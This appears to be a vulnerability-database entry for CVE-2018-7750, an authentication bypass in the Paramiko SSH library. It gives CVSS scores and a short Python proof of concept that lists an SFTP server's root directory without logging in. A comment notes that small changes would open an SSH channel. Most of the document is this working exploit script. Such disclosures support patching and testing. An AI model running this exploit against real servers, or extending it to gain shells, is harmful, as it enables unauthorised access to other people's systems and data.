Paramiko 2.4.1 - Authentication Bypass

2018-10-2900:00:00

Adam Brown

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

JSON

Paramiko 2.4.1 - Authentication Bypass

# Exploit Title: Paramiko 2.4.1 - Authentication Bypass
# Date: 2018-10-27
# Exploit Author: Adam Brown
# Vendor Homepage: https://www.paramiko.org
# Software Link: https://github.com/paramiko/paramiko/tree/v1.15.2
# Version: < 1.17.6, 1.18.x < 1.18.5, 2.0.x < 2.0.8, 2.1.x < 2.1.5, 2.2.x < 2.2.3, 2.3.x < 2.3.2, and 2.4.x < 2.4.1
# Tested on: Multiple
# CVE : CVE-2018-7750

# This PoC is based on discussions found at the following github issue:
# https://github.com/paramiko/paramiko/issues/1175
# TLDR, Paramiko doesn't check if the client has completed the authentication step
# before allowing the client to open channels. The PoC below connects to an SFTP
# server, and lists the root directory without authenticating. Slight modification
# is required if you want to open an SSH channel.

#!/usr/bin/python
import paramiko

host = '127.0.0.1'
port = 22

trans = paramiko.Transport((host, port))
trans.start_client()

# If the call below is skipped, no username or password is required.
# trans.auth_password('username', 'password')

sftp = paramiko.SFTPClient.from_transport(trans)
print(sftp.listdir('/'))
sftp.close()